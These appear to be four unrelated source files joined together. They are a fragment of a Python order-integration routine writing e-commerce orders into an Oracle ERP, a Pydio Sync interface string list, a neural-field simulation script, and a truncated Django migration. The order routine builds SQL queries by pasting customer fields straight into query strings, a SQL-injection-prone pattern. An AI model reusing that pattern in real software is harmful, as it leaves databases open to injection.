to_date('%s', 'YYYY-MM-DD'), -- DTINCLUSAO
null, -- CODCLI
to_date('%s', 'YYYY-MM-DD'), -- DTALTERACAO
to_date('%s','YYYY-MM-DD') -- DTNASC
)
''' % (order['customer_taxvat'], order['billing_name'], order['telephone'][-13:],
order['postcode'], order['customer_email'], order['increment_id'], today, today,
order['customer_dob'][:10] if 'customer_dob' in order else '1900-01-01')
print query
db.execute(query)
order['integration'] = 'Efetivar Pre-cadastro'
if order['integration'] == 'Efetivar Pre-cadastro':
# check PCCLIENT
query = "select count(*) count from PCCLIENT where regexp_replace(CGCENT, '[^0-9]', '') = '" + order['customer_taxvat'] + "'"
print query
count = db.query(query)[0]['count']
if count > 0:
query = "select max(codcli) codcli from PCCLIENT where regexp_replace(CGCENT, '[^0-9]', '') = '" + order['customer_taxvat'] + "'"
print query
codcli = db.query(query)[0]['codcli']
order['CODCLI'] = codcli
order['integration'] = 'Endereço pendente'
if order['integration'] == 'Endereço pendente':
# check Address on PCCLIENT
query = '''
select CODCLI
from PCCLIENT
where regexp_replace(CGCENT, '[^0-9]', '') = '%s'
and regexp_replace(CEPENT, '[^0-9]', '') = '%s'
''' % (order['customer_taxvat'], order['postcode'].replace('-', ''))
print query
result = db.query(query)
if len(result) > 0:
order['CODCLI'] = result[0]['codcli']
order['CODENDENTCLI'] = 'Cliente'
order['integration'] = 'Pedido pendente'
# check Address on PCCLIENTENDENT
query = '''
select PCCLIENT.CODCLI, CODENDENTCLI
from PCCLIENTENDENT, PCCLIENT
where PCCLIENTENDENT.CODCLI = PCCLIENT.CODCLI
and regexp_replace(PCCLIENT.CGCENT, '[^0-9]', '') = '%s'
and regexp_replace(PCCLIENTENDENT.CEPENT, '[^0-9]', '') = '%s'
''' % (order['customer_taxvat'], order['postcode'].replace('-', ''))
print query
result = db.query(query)
if len(result) > 0:
order['CODENDENTCLI'] = result[0]['codendentcli']
order['CODCLI'] = result[0]['codcli']
order['integration'] = 'Pedido pendente'
if order['integration'] == 'Pedido criado' or order['integration'].startswith('Pedido rejeitado') or order['integration'] == 'Pedido pendente':
query = '''
select 1
from PCPEDCFV
where NUMPEDRCA = '%s'
''' % (order['increment_id'])
print query
result = db.query(query)
if len(result) == 0:
# check PCPEDCFV
query = '''
insert into PCPEDCFV (IMPORTADO, NUMPEDRCA, CODUSUR, CGCCLI, DTABERTURAPEDPALM, DTFECHAMENTOPEDPALM, CODFILIAL, CODCOB, CODPLPAG, CONDVENDA, ORIGEMPED)
values
(
1, -- IMPORTADO
'%s', -- NUMPEDRCA
1, -- CODUSUR
'%s', -- CGCCLI
to_date('%s', 'YYYY-MM-DD'), -- DTABERTURAPEDPALM
to_date('%s', 'YYYY-MM-DD'), -- DTFECHAMENTOPEDPALM
1, -- CODFILIAL
'D', -- CODCOB
1, -- CODPLPAG
1, -- CONDVENDA
'F' -- ORIGEMPED
)
''' % (order['increment_id'], order['customer_taxvat'], order['created_at'][:10],
order['created_at'][:10])
print query
db.execute(query)
full_order = m.getOrder(order['increment_id'])
query_products = [
" select %s, 1, '%s', to_date('%s', 'YYYY-MM-DD'), %s, %s, %s, %s from dual " % (
order['increment_id'], order['customer_taxvat'], order['created_at'][:10],
item['sku'], item['qty_ordered'], item['price'], index+1
)
for index, item in enumerate(full_order['items'])
]
query = '''
insert into PCPEDIFV (NUMPEDRCA,CODUSUR,CGCCLI,DTABERTURAPEDPALM,CODPROD,QT,PVENDA,NUMSEQ)
%s
''' % ' union all '.join(query_products)
print query
db.execute(query)
order['integration'] = 'Pedido criado'
query = '''
select IMPORTADO, observacao_pc
from PCPEDCFV
where NUMPEDRCA = '%s'
''' % (order['increment_id'])
print query
result = db.query(query)[0]
query = '''
select observacao_pc
from PCPEDIFV
where NUMPEDRCA = '%s'
''' % (order['increment_id'])
print query
result_items = db.query(query)
if result['importado'] == 2:
order['integration'] = 'OK'
elif result['importado'] == 3:
order['integration'] = 'Pedido rejeitado: ' + '. '.join([result['observacao_pc']] + [i['observacao_pc'] for i in result_items])
elif result['importado'] == 1:
order['integration'] = 'Pedido Criado'
sorted_orders = [
[i.get('integration') or '', i['increment_id'], i['created_at'], i['status'], i['billing_name'], i['customer_taxvat'], i['total_item_count'], i['base_grand_total'], i['postcode'].replace('-', ''), i.get('CODCLI'), i.get('CODENDENTCLI'), i.get('NUMPED')]
for i in sorted(orders.values(), key=lambda x: x['created_at'])
]
self.updateProgress.emit(50, json.dumps(sorted_orders))
except Exception as e:
print str(e)
traceback.print_exc()
def toggle(self):
self.isRunning = not self.isRunning
def reset(self):
self.isRunning = True
self.iteration = 0
def finish(self):
self.terminate()
class Winthor():
def getQuantities(self):
r = requests.post(
'http://192.168.24.13/PCSIS2699.EXE/soap/PC_Estoque',
data='''
<x:Envelope xmlns:x="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn3="urn:uPCEstoqueIntf-PC_Estoque">
<x:Header/>
<x:Body>
<urn3:Pesquisar>
<urn3:Codigo_Filial>1</urn3:Codigo_Filial>
</urn3:Pesquisar>
</x:Body>
</x:Envelope>''',
headers={'Content-Type': 'text/xml; charset=utf-8'})
root = ET.fromstring(r.text.encode('utf-8'))
return [dict([(child.tag, child.text) for child in i]) for i in root[0][0][1]]
def getProducts(self):
r = requests.post(
'http://192.168.24.13/PCSIS2699.EXE/soap/PC_Estoque',
data='''
<x:Envelope xmlns:x="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn3="urn:uPCProdutoIntf-PC_Produto">
<x:Header/>
<x:Body>
<urn3:Pesquisar>
<urn3:Somente_Produtos_Ativos>S</urn3:Somente_Produtos_Ativos>
</urn3:Pesquisar>
</x:Body>
</x:Envelope>''',
headers={'Content-Type': 'text/xml; charset=utf-8'})
root = ET.fromstring(r.text.encode('utf-8'))
return [dict([(child.tag, child.text) for child in i]) for i in root[0][0][1]]
def getPrices(self):
r = requests.post(
'http://192.168.24.13/PCSIS2699.EXE/soap/PC_Preco',
data='''
<x:Envelope xmlns:x="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn3="urn:uPCPrecoIntf-PC_Preco">
<x:Header/>
<x:Body>
<urn3:Pesquisar>
</urn3:Pesquisar>
</x:Body>
</x:Envelope>
''',
headers={'Content-Type': 'text/xml; charset=utf-8'})
root = ET.fromstring(r.text.encode('utf-8'))
return [dict([(child.tag, child.text) for child in i]) for i in root[0][0][1]]
def getOrder(self, incrementId):
r = requests.post(
'http://192.168.24.13/PCSIS2699.EXE/soap/PC_Pedido',
data='''
<x:Envelope xmlns:x="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn12="urn:uPCPedidoIntf-PC_Pedido">
<x:Header/>
<x:Body>
<urn12:PesquisarSituacaoPedido>
<urn12:Numero_Pedido_Ecommerce>%s</urn12:Numero_Pedido_Ecommerce>
</urn12:PesquisarSituacaoPedido>
</x:Body>
</x:Envelope>
''' % incrementId,
headers={'Content-Type': 'text/xml; charset=utf-8'})
root = ET.fromstring(r.text.encode('utf-8'))
return [dict([(child.tag, child.text) for child in i]) for i in root[0][0][1]]
class ErrorMessage(QtGui.QWidget):
def __init__(self):
QtGui.QWidget.__init__(self)
QtGui.QMessageBox.critical(self,
"Erro!",
"Utilize a rotina a partir do menu.")
self.close()
# Expected call: routine.exe USER DB_PASS DB_ALIAS DB_USER ROUTINE_NUMBER
def main(args):
app = QtGui.QApplication([])
if len(args) != 6:
print('Erro! Número de parâmetros diferente do esperado.')
print('Esperado: 6. Encontrado: %s' % len(args))
ErrorMessage()
return
args = args[1:]
ex = Routine9813(*args)
sys.exit(app.exec_())
if __name__ == '__main__':
main(sys.argv)
|
def _(a_string): return a_string
var_1=_('How can I find my server URL?')
var_2=_('The server URL is the adress that you can see in your browser when accessing Pydio via the web.')
var_3=_('It starts with http or https depending on your server configuration.')
var_4=_('If you are logged in Pydio and you see the last part of the URL starting with "ws-", remove this part and only keep the beginning (see image below).')
var_5=_('Got it!')
var_6=_('Connecting ...')
var_7=_('Configure Connection')
var_8=_('Error while trying to connect to %1 :')
var_9=_('%1')
var_10=_('Connect to the server with the same URL as the one you would use to access through a web browser, e.g. http://mydomain.com/pydio')
var_11=_('Required')
var_12=_('Required')
var_13=_('Required')
var_14=_('Tips')
var_15=_('where can I find the server URL?')
var_16=_('Connect')
var_17=_('Trust SSL certificate')
var_18=_('1/3 Select a workspace')
var_19=_('Welcome %1!')
var_20=_('You are connecting to %1')
var_21=_('change')
var_22=_('change')
var_23=_('Remote workspace')
var_24=_('This workspace is read only!')
var_25=_('Synchronise only a subfolder of this workspace')
var_26=_('loading')
var_27=_('Whole workspace')
var_28=_('loading')
var_29=_('Workspace')
var_30=_('Folder')
var_31=_('Change')
var_32=_('Next')
var_33=_('Advanced Parameters')
var_34=_('Save changes')
var_35=_('2/3 Select a destination')
var_36=_('By default a local folder will be created on your computer')
var_37=_('Change')
var_38=_('3/3 Optional Parameters')
var_39=_('Server')
var_40=_('Workspace')
var_41=_('Folder')
var_42=_('Whole workspace')
var_43=_('change')
var_44=_('Local folder')
var_45=_('change')
var_46=_('Name this synchro')
var_47=_('Advanced Parameters')
var_48=_('Previous')
var_49=_('Next')
var_50=_('Previous')
var_51=_('Next')
var_52=_('SYNC NAME')
var_53=_('DATA SIZE')
var_54=_('ESTIMATED TIME')
var_55=_('Ready for ignition!')
var_56=_('Are you ready to launch the synchronization?')
var_57=_('Your data will be in orbit in no time!')
var_58=_('FIRE THE ROCKET!')
var_59=_('change parameters')
var_60=_('Synchronization running...')
var_61=_('Liftoff! First sync can take some time...')
var_62=_('CREATE NEW SYNCHRO')
var_63=_('DONE')
var_64=_('Sync Direction')
var_65=_('Modifications are sent to the server but the client does not download anything.')
var_66=_('Modifications from both sides (local/remote) are automatically reflected on the other side.')
var_67=_('Modifications from the server are downloaded buth nothing is sent to the server.')
var_68=_('Upload Only')
var_69=_('computer to server')
var_70=_('Bi-directional')
var_71=_('default when possible')
var_72=_('Download Only')
var_73=_('server to computer')
var_74=_('Sync Frequency')
var_75=_('By default, the application will synchronize automatically')
var_76=_('Automatically')
var_77=_('Manually')
var_78=_('Given Time')
var_79=_('Run the sync every day at')
var_80=_('Conflicts')
var_81=_('When files were modified on both the server and your computer at the same time, a conflict is detected.')
var_82=_('Automatic')
var_83=_('Solve conflicts manually')
var_84=_('With the default keep-both behavior conflicting files will be copied on your local sync. Which version is to be kept?')
var_85=_('Keep both')
var_86=_('Prefer local')
var_87=_('Prefer remote')
var_88=_('Connection settings')
var_89=_('Increase the timeout in case of slow responsive server')
var_90=_('Timeout in seconds')
var_91=_('You can increase or reduce the number of concurrent connections. More means a faster sync but requires a server with more resources. (Default: 4)')
var_92=_('Concurrent connections')
var_93=_('Include/Exclude from Sync')
var_94=_('Syncronise, use a list of files or patterns to include in the sync')
var_95=_('Do not synchronise, list of files or patterns to exclude from sync')
var_96=_('SYNC %1 parameters')
var_97=_('Server')
var_98=_('Workspace')
var_99=_('Folder')
var_100=_('Resync task')
var_101=_('This operation will make sure that your server and local folder are correctly synchronized. Beware, this can take a while, and may be resource intensive.')
var_102=_('Cancel')
var_103=_('Proceed')
var_104=_('Trigger a full re-indexation')
var_105=_('Label')
var_106=_('Server Connexion')
var_107=_('Login')
var_108=_('Password')
var_109=_('Local Folder')
var_110=_('Choose')
var_111=_('Remote workspace')
var_112=_('Workspace')
var_113=_('Folder')
var_114=_('Change')
var_115=_('This workspace is read only!')
var_116=_('Synchronise only a subfolder of this workspace')
var_117=_('Whole workspace')
var_118=_('[loading...]')
var_119=_('Advanced parameters')
var_120=_('Delete Sync')
var_121=_('Save Parameters')
var_122=_('Help us! ')
var_123=_('Give us your feedback to improve PydioSync.')
var_124=_('Please wait...')
var_125=_('PydioSync Feedback Form')
var_126=_('You have the power to help us improve PydioSync by submitting anonymously this simple form.')
var_127=_('Include the number of synced files;')
var_128=_('Include the last sequence number;')
var_129=_('Include server info;')
var_130=_('Include errors;')
var_131=_('Include the number of errors;')
var_132=_('Comments (Appreciated)')
var_133=_('About')
var_134=_('General configurations page')
var_135=_('Update settings')
var_136=_('Enable / Disable update here.')
var_137=_('Set the update check frequency (here 1 means update check only once a day, default value 0 means it check for update each time agent establishes a new connection with UI) ')
var_138=_('Update check frequency in days')
var_139=_('Date on which last update check happened')
var_140=_('Last update check was on: ')
var_141=_('Proxy settings')
var_142=_('Enable / Disable Proxy.')
var_143=_('If you want the network connections to pass through proxy, fill the parameters below.')
var_144=_('Log settings')
var_145=_('You can change the name of log file here.')
var_146=_('File Name')
var_147=_('Limit the number of log files to be stored locally.')
var_148=_('Number of log files')
var_149=_('Set restrictions on log file size here.')
var_150=_('Enhance the log details as you need them.')
var_151=_('Info')
var_152=_('Debug')
var_153=_('Warning')
var_154=_('Other settings')
var_155=_('Max wait time for local db access')
var_156=_('If you encounter database locked error try increasing this value')
var_157=_('Timeout in seconds')
var_158=_('Set Language')
var_159=_('Language ')
var_160=_('Update Settings')
var_161=_('Ooops, cannot contact agent! Make sure it is running correctly, process will try to reconnect in 20s')
var_162=_('Select a workspace')
var_163=_('Full path to the local folder')
var_164=_('Are you sure you want to delete this synchro? No data will be deleted')
var_165=_('computing...')
var_166=_('Status')
var_167=_('syncing')
var_168=_('Size')
var_169=_('Estimated time')
var_170=_('Status')
var_171=_('syncing')
var_172=_('Status')
var_173=_('syncing')
var_174=_('Last sync')
var_175=_('ERROR')
var_176=_('Status')
var_177=_('idle')
var_178=_('[DISABLED]')
var_179=_('Conflicts')
var_180=_('Solve Conflict')
var_181=_('Solved')
var_182=_('Last files synced')
var_183=_('Open File')
var_184=_('Transfers in progress')
var_185=_('An element named %1 was modified on both the server and on your local computer. Select how you want to solve this conflicting case:')
var_186=_('Apply to all conflicts')
var_187=_('Mine')
var_188=_('Both Versions')
var_189=_('Theirs')
var_190=_('Create a new synchronization')
var_191=_('Create a new synchronization')
var_192=_('Share %1 via Pydio')
var_193=_('Share %1 via Pydio')
var_194=_('Description')
var_195=_('Path')
var_196=_('Share item')
var_197=_('by creating a public link that can easily be sent to your contacts.')
var_198=_('You can customize the link parameters using the forms below.')
var_199=_('Secure Link Access')
var_200=_('Optional Password')
var_201=_('Password')
var_202=_('Expires After')
var_203=_('Days')
var_204=_('Downloads')
var_205=_('Security')
var_206=_('Password')
var_207=_('Expires after')
var_208=_('Days')
var_209=_('Downloads')
var_210=_('Advanced parameters')
var_211=_('Link Handle')
var_212=_('If you want a durable and pretty link (like https://.../my-share-link), you can use this field. Link handle will be generated if left empty.')
var_213=_('Description')
var_214=_('This will be displayed to the shared users.')
var_215=_('Access Rights')
var_216=_('By default, the item will be previewed and downloadable')
var_217=_('Preview')
var_218=_('Download')
var_219=_('Upload')
var_220=_('Generate Link')
var_221=_('Generate Link')
var_222=_('Share %1 via Pydio')
var_223=_('Shared Link')
var_224=_('Shared link to the selected item already exists. Below is the link to the selected item')
var_225=_('New shared link to the selected item has been generated')
var_226=_('Shared Link to the selected item has not been generated')
var_227=_('Copy to Clipboard')
var_228=_('UnShare Link')
var_229=_('Text has been copied to clipboard.')
var_230=_('Successfully unshared.')
var_231=_('Please wait ...')
var_232=_('Welcome to the Pydio Sync')
var_233=_('The easiest way to keep your data in control')
var_234=_('Loading...')
var_235=_('Get Started')
var_236=_('Required')
var_237=_('Proxy settings')
var_238=_('Get Started')
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (c) 2010 Nicolas Rougier - INRIA - CORTEX Project
#
# This program is free software: you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by the Free
# Software Foundation, either version 3 of the License, or (at your option)
# any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY
# or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public
# License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program. If not, see <http://www.gnu.org/licenses/>.
#
# Contact: CORTEX Project - INRIA
# INRIA Lorraine,
# Campus Scientifique, BP 239
# 54506 VANDOEUVRE-LES-NANCY CEDEX
# FRANCE
''' Numerical integration of dynamic neural fields.
This script implements the numerical integration of dynamic neural fields [1]_
of the form:
1 ∂U(x,t) ⌠+∞
- ------- = -U(x,t) + ⎮ w(|x-y|).f(U(y,t)).dy + I(x,t) + h
α ∂t ⌡-∞
where U(x,t) is the potential of a neural population at position x and time t
W(d) is a neighborhood function from ℝ⁺ → ℝ
f(u) is the firing rate of a single neuron from ℝ → ℝ
I(x,t) is the input at position x and time t
h is the resting potential
α is the temporal decay of the synapse
:References:
_[1] http://www.scholarpedia.org/article/Neural_fields
'''
import glumpy
import numpy as np
import scipy.linalg
def fromdistance(fn, shape, center=None, dtype=float):
'''Construct an array by executing a function over a normalized distance.
The resulting array therefore has a value
``fn(sqrt((x-x0)²+(y-y0)²))`` at coordinate ``(x,y)`` where x,y ∈ [-1,+1]²
Parameters
----------
fn : callable
The function is called with one parameter representing the normalized
distance. `fn` must be capable of operating on arrays, and should
return a scalar value.
shape : (N,) tuple of ints
Shape of the output array, which also determines the shape of
the coordinate arrays passed to `fn`.
dtype : data-type, optional
Data-type of the coordinate arrays passed to `fn`. By default,
`dtype` is float.
'''
def distance(*args):
d = 0
for i in range(len(shape)):
d += (2*args[i]/float(shape[i]-1)-1 -center[i])**2
return np.sqrt(d) #/np.sqrt(len(shape))
if center == None:
center = [0.,]*len(shape)
return fn(np.fromfunction(distance,shape,dtype=dtype))
def convolve1d( Z, K ):
''' Discrete, clamped, linear convolution of two one-dimensional sequences.
:Parameters:
Z : (N,) array_like
First one-dimensional input array (input).
K : (M,) array_like
Second one-dimensional input array (kernel).
:Returns:
out : array
Discrete, clamped, linear convolution of `Z` and `K`.
'''
R = np.convolve(Z, K, 'same')
i0 = 0
if R.shape[0] > Z.shape[0]:
i0 = (R.shape[0]-Z.shape[0])/2 + 1 - Z.shape[0]%2
i1 = i0+ Z.shape[0]
return R[i0:i1]
def convolve2d(Z, K, USV = None):
''' Discrete, clamped convolution of two two-dimensional arrays.
:Parameters:
Z : (N1,N2) array_like
First two-dimensional input array (input)
K : (M1,M2) array_like
Second two-dimensional input array (kernel)
:*Returns:
out : ndarray
Discrete, clamped, linear convolution of `Z` and `K`
'''
epsilon = 1e-9
if USV is None:
U,S,V = scipy.linalg.svd(K)
U,S,V = U.astype(K.dtype), S.astype(K.dtype), V.astype(K.dtype)
else:
U,S,V = USV
n = (S > epsilon).sum()
R = np.zeros( Z.shape )
for k in range(n):
Zt = Z.copy() * S[k]
for i in range(Zt.shape[0]):
Zt[i,:] = convolve1d(Zt[i,:], V[k,::-1])
for i in range(Zt.shape[1]):
Zt[:,i] = convolve1d(Zt[:,i], U[::-1,k])
R += Zt
return R
if __name__ == '__main__':
# Parameters
n = 40
dt = 0.05
alpha = 12.0
tau = 0.25
h = 0.0
s = (n*n)/(40.*40.)
noise = 0.01
theta = 0
dtheta = 0.025
rho = 0.75
n_stims = 3
u = (dt/tau)/alpha
def f(x):
return np.maximum(x,0)
def g(x, width=0.1):
return np.exp(-(x/width)**2/2)
def w(x):
return 1.0*g(x,0.1)-0.5*g(x,1.0)
def stimulus(shape,center,width):
def g2(x) : return g(x,width)
return fromdistance(g2,shape,center)
# Initialization
I = np.zeros((n,n),dtype=np.float32) # input
Z = np.zeros((n,n), dtype=np.float32) # output
Z_ = np.zeros((n,n), dtype=np.float32) # membrane potential
# Kernel
K = fromdistance(w,(2*n+1,2*n+1))
USV = scipy.linalg.svd(K)
# Output decoding
X,Y = np.mgrid[0:n,0:n]
X = 2*X/float(n-1) - 1
Y = 2*Y/float(n-1) - 1
window = glumpy.Window(2*512, 512)
Ii = glumpy.Image(I, interpolation='bicubic',
cmap=glumpy.colormap.Grey_r, vmin=0.0, vmax=2.5)
Zi = glumpy.Image(Z, interpolation='bicubic',
cmap=glumpy.colormap.Grey_r, vmin=0.0, vmax=0.25)
@window.event
def on_draw():
global Zi, Ii
window.clear()
Ii.blit(0,0,512,512)
Zi.blit(512,0,512,512)
@window.event
def on_key_press(key, modifiers):
global Z
if key == glumpy.key.SPACE:
Z[...] = 0
Z_[...] = 0
@window.event
def on_idle(*args):
global I, Z, Z_, Ii, Zi, dt, n, h, s, tau, alpha, theta, dtheta, rho, u
theta += dtheta
I[...] = np.zeros((n,n))
for j in range(n_stims):
t = theta+ j*2*np.pi/n_stims
x,y = rho*np.cos(t),rho*np.sin(t)
I += 2.5*stimulus((n,n), (x,y), 0.1)
I += (2*np.random.random((n,n))-1)*noise
# Compute field activity
for i in range(1):
L = convolve2d(Z,K,USV)/s
Z_ *= (1-tau)
L += I
L *= u
Z_ += L
#Z_[...] = np.minimum(np.maximum(Z_,0),1)
Z[...] = f(Z_)
Zi.update()
Ii.update()
window.draw()
window.mainloop()
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2017-01-20 09:04
from __future__ import unicode_literals
import datetime
from django.conf import settings
import django.contrib.postgres.fields.jsonb
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='AdProduct',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('ad_date', models.CharField(blank=True, default=None, max_length=20, null=True)),
('item_no', models.CharField(blank=True, max_length=30, null=True)),
('mfg', models.CharField(blank=True, max_length=30, null=True)),
('desc', models.CharField(blank=True, max_length=200, null=True)),
('vendor_number', models.CharField(blank=True, max_length=30, null=True)),
('order_date', models.CharField(blank=True, max_length=30, null=True)),
('received_dc', models.CharField(blank=True, max_length=30, null=True)),
('received_137', models.CharField(blank=True, max_length=30, null=True)),
('received_buyer', models.CharField(blank=True, max_length=40, null=True)),
('received_other', models.CharField(blank=True, default=None, max_length=50, null=True)),
('photo_dldate', models.CharField(blank=True, max_length=50, null=True)),
('whowhen', models.CharField(blank=True, max_length=100, null=True)),
('studio_out', models.CharField(blank=True, max_length=30, null=True)),
('checked_out', models.CharField(blank=True, max_length=100, null=True)),
('have_image', models.CharField(blank=True, max_length=30, null=True)),
('confirmed_placed', models.CharField(blank=True, default='None', max_length=200, null=True)),
('shooting_instructions', models.CharField(blank=True, default=None, max_length=200, null=True)),
('studio_in', models.CharField(blank=True, max_length=50, null=True)),
('notes', models.CharField(blank=True, max_length=200, null=True)),
('item_ns', models.CharField(blank=True, max_length=30, null=True)),
('short_sku', models.CharField(blank=True, max_length=30, null=True)),
('from_file', models.CharField(blank=True, max_length=30, null=True)),
('sku', models.CharField(blank=True, max_length=30, null=True)),
('sku_ns', models.CharField(blank=True, max_length=30, null=True)),
('first', models.CharField(blank=True, max_length=5, null=True)),
('first_date', models.CharField(blank=True, max_length=30, null=True)),
('buyer', models.CharField(blank=True, max_length=50, null=True)),
('merch_to_137', models.CharField(blank=True, max_length=200, null=True)),
('product_class', models.CharField(blank=True, max_length=4, null=True)),
('dc_received_u', models.IntegerField(blank=True, null=True)),
('curr_dc_oh_u', models.IntegerField(blank=True, null=True)),
('dc_curr_oo_u', models.IntegerField(blank=True, null=True)),
('na', models.CharField(blank=True, max_length=5, null=True)),
('size_type', models.CharField(blank=True, max_length=10, null=True)),
('color_desc', models.CharField(blank=True, max_length=200, null=True)),
('version', models.CharField(blank=True, max_length=20, null=True)),
],
),
migrations.CreateModel(
name='Buyers',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('buyer', models.CharField(blank=True, max_length=50, null=True)),
('department', models.CharField(blank=True, max_length=3, null=True)),
('product_class', models.CharField(blank=True, max_length=4, null=True, unique=True)),
('description', models.CharField(blank=True, max_length=150, null=True)),
],
),
migrations.CreateModel(
name='CheckProduct',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('sku_ns', models.CharField(max_length=30)),
('brand', models.CharField(blank=True, max_length=20, null=True)),
('desc', models.CharField(blank=True, max_length=200, null=True)),
('confirmed_placed', models.CharField(blank=True, default='None', max_length=200, null=True)),
('ad_date', models.CharField(blank=True, max_length=20, null=True)),
('mfg', models.CharField(blank=True, max_length=30, null=True)),
('already_tracked', models.CharField(blank=True, default='None', max_length=300, null=True)),
('na', models.NullBooleanField(default=False)),
],
),
migrations.CreateModel(
name='ColorCode',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('code', models.CharField(max_length=3, unique=True)),
('color', models.CharField(blank=True, max_length=30, null=True)),
],
),
migrations.CreateModel(
name='ColorGrid',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('color', models.CharField(blank=True, max_length=30, null=True)),
('hexcode', models.CharField(max_length=6, unique=True)),
('description', models.CharField(max_length=300, unique=True)),
],
),
migrations.CreateModel(
name='Department',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(choices=[('Admin', 'Admin'), ('Advertising', 'Advertising'), ('Art', 'Art'), ('Layout', 'Layout'), ('Copy', 'Copy'), ('Purchasing', 'Purchasing'), ('IT', 'IT')], max_length=64)),
],
),
migrations.CreateModel(
name='Deployed',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('item_no', models.CharField(blank=True, max_length=30, null=True)),
('operator', models.CharField(blank=True, max_length=50, null=True)),
('filenames', django.contrib.postgres.fields.jsonb.JSONField()),
],
),
migrations.CreateModel(
name='FirstReceipt',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('buyer', models.CharField(blank=True, max_length=30, null=True)),
('dc_received_u', models.IntegerField(blank=True, null=True)),
('curr_dc_oh_u', models.IntegerField(blank=True, null=True)),
('dc_curr_oo_u', models.IntegerField(blank=True, null=True)),
('date_received', models.CharField(blank=True, max_length=20, null=True)),
('item_ns', models.CharField(blank=True, max_length=30, null=True)),
('short_sku', models.CharField(blank=True, max_length=30, null=True)),
('size_type', models.CharField(blank=True, max_length=10, null=True)),
('item_no', models.CharField(blank=True, max_length=30, null=True)),
('vendor_style', models.CharField(blank=True, max_length=30, null=True)),
('description', models.CharField(blank=True, max_length=200, null=True)),
('color_desc', models.CharField(blank=True, max_length=200, null=True)),
('have_image', models.CharField(blank=True, max_length=30, null=True)),
('ad_date', models.CharField(blank=True, max_length=50, null=True)),
('order_date', models.CharField(blank=True, max_length=50, null=True)),
('received_dc', models.CharField(blank=True, max_length=30, null=True)),
('received_137', models.CharField(blank=True, max_length=30, null=True)),
('from_file', models.CharField(blank=True, max_length=30, null=True)),
('photo_dldate', models.DateField(blank=True, null=True)),
('whowhen', models.CharField(blank=True, max_length=100, null=True)),
('studio_out', models.CharField(blank=True, max_length=50, null=True)),
('checked_out', models.CharField(blank=True, max_length=100, null=True)),
('confirmed_placed', models.CharField(blank=True, default='None', max_length=200, null=True)),
('studio_in', models.CharField(blank=True, max_length=50, null=True)),
('merch_to_137', models.CharField(blank=True, max_length=200, null=True)),
('product_class', models.CharField(blank=True, max_length=4, null=True)),
],
),
migrations.CreateModel(
name='HotItem',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('item_no', models.CharField(max_length=30, unique=True)),
('ad_date', models.CharField(blank=True, default=None, max_length=20, null=True)),
('create_date', models.DateField(default=datetime.date.today)),
('item_name', models.CharField(blank=True, max_length=210, null=True)),
('comments', models.TextField(blank=True, max_length=2000, null=True)),
('reply', models.TextField(blank=True, max_length=2000, null=True)),
('confirmed_placed', models.CharField(blank=True, default=None, max_length=200, null=True)),
],
),
migrations.CreateModel(
name='InventoryProduct',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('sku', models.CharField(blank=True, max_length=7, null=True)),
('item_no', models.CharField(blank=True, max_length=30, null=True, unique=True)),
('desc', models.CharField(blank=True, max_length=200, null=True)),
('quantity', models.CharField(max_length=3)),
('source', models.CharField(blank=True, max_length=100, null=True)),
],
),
migrations.CreateModel(
name='LargeWebfiles',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('long_sku', models.CharField(max_length=30)),
('filename', models.CharField(max_length=50)),
('mod_date', models.CharField(blank=True, max_length=200, null=True)),
('item_ns', models.CharField(max_length=30, null=True)),
('sku', models.CharField(max_length=30, null=True)),
('sku_ns', models.CharField(max_length=30, null=True)),
],
),
migrations.CreateModel(
name='MSWebfiles',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('long_sku', models.CharField(max_length=30)),
('filename', models.CharField(max_length=50)),
('item_ns', models.CharField(max_length=30, null=True)),
('sku', models.CharField(max_length=30, null=True)),
('sku_ns', models.CharField(max_length=30, null=True)),
],
),
migrations.CreateModel(
name='OneImageFiles',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('item_no', models.CharField(max_length=30)),
],
),
migrations.CreateModel(
name='PrintFile',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('assoc_sku', models.CharField(max_length=30)),
('filename', models.CharField(blank=True, max_length=500, null=True)),
('path', models.CharField(blank=True, max_length=200, null=True)),
('mod_date', models.CharField(blank=True, max_length=200, null=True)),
],
),
migrations.CreateModel(
name='ProcessedFiles',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('item_no', models.CharField(max_length=30)),
('filename', models.CharField(blank=True, max_length=50, null=True)),
('processor', models.CharField(blank=True, max_length=50, null=True)),
('item_ns', models.CharField(blank=True, max_length=30, null=True)),
('sku', models.CharField(blank=True, max_length=30, null=True)),
('sku_ns', models.CharField(blank=True, max_length=30, null=True)),
